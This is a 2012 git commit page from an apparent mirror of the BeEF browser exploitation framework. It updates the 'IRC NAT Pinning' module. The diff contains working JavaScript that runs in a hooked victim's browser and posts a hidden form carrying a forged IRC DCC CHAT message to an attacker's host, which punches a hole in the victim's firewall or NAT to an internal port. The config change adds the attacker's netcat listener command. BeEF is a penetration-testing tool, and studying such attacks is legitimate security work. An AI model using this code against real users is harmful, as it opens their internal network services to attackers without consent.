Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Updated description

Browse Source
This commit is contained in:
bmantra
2012-06-30 11:56:21 +02:00
parent f34443ef46
commit 3784cc4e37
2 changed files with 23 additions and 37 deletions
Download Patch File Download Diff File Expand all files Collapse all files

58
modules/network/nat_pinning_irc/command.js
View File

@@ -22,47 +22,33 @@ beef.execute(function() {
var d = dot.split('.');
return (((+d[0])*256+(+d[1]))*256+(+d[2]))*256+(+d[3]);
}
var myIframe = beef.dom.createInvisibleIframe();
var myForm = document.createElement("form");
var action = connectto + ":6667/"
//send a request
function send_msg(privateip,privateport,connectto){
myForm.setAttribute("name", "data");
myForm.setAttribute("method", "post");
//it must be multipart/form-data so the message appears on separate line
myForm.setAttribute("enctype", "multipart/form-data");
myForm.setAttribute("action", action);
//create hidden iFrame
var iframe = document.createElement("iframe");
iframe.setAttribute("id","irc_nat_pinning_<%= @command_id %>");
iframe.setAttribute("style", "visibility:hidden; width:1px; height: 1px;");
document.body.appendChild(iframe);
iframe = document.getElementById("irc_nat_pinning_<%= @command_id %>");
//create message, refer Samy Kamkar (http://samy.pl/natpin/)
x = String.fromCharCode(1);
var s = 'PRIVMSG beef :'+x+'DCC CHAT beef '+dot2dec(privateip)+' '+privateport+x+"\n";
//create message textarea
var myExt = document.createElement("textarea");
myExt.setAttribute("id","msg_<%= @command_id %>");
myExt.setAttribute("name","msg_<%= @command_id %>");
myForm.appendChild(myExt);
myIframe.contentWindow.document.body.appendChild(myForm);
//create form
var action = connectto + ":6667/"
var myform = document.createElement("form");
myform.setAttribute("name", "data");
myform.setAttribute("method", "post");
myform.setAttribute("enctype", "multipart/form-data");
myform.setAttribute("action", action);
iframe.contentWindow.document.body.appendChild(myform);
//create message, refer Samy Kamkar (http://samy.pl/natpin/)
x = String.fromCharCode(1);
var s = 'PRIVMSG beef :'+x+'DCC CHAT beef '+dot2dec(privateip)+' '+privateport+x+"\n";
//create message textarea
var myExt = document.createElement("textarea");
myExt.setAttribute("id","msg_<%= @command_id %>");
myExt.setAttribute("name","msg_<%= @command_id %>");
myform.appendChild(myExt);
//send message
iframe.contentWindow.document.getElementById("msg_<%= @command_id %>").value = s;
myform.submit();
alert(s);
//send message
myIframe.contentWindow.document.getElementById("msg_<%= @command_id %>").value = s;
myForm.submit();
//clean up
setTimeout('document.body.removeChild(document.getElementById("irc_nat_pinning_<%= @command_id %>"));', 15000);
}
send_msg(privateip,privateport,connectto);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Message sent');
});

2
modules/network/nat_pinning_irc/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
enable: true
category: "Network"
name: "IRC NAT Pinning"
description: "Attempts to open closed ports on statefull firewalls and attempts to create pinholes on NAT-devices. The firewall/NAT-device must support IRC connection tracking. On the attackers side the TCP connection just needs to be accepted. Then you can connect to the victims public IP on that port. For more information, please refer to: <a href='http://samy.pl/natpin/'>http://samy.pl/natpin/</a> ."
description: "Attempts to open closed ports on statefull firewalls and attempts to create pinholes on NAT-devices. The firewall/NAT-device must support IRC connection tracking. On the attackers side the TCP connection just needs to be accepted (nc -l -p 6667). Then you can connect to the victims public IP on that port. For the moment it hasn't been tested with NAT, but it works with iptables when ip_conntrack and ip_conntrack_irc are loaded. For more information, please refer to: <a href='http://samy.pl/natpin/'>http://samy.pl/natpin/</a> ."
authors: ["Bart Leppens"]
target:
working: ["FF"]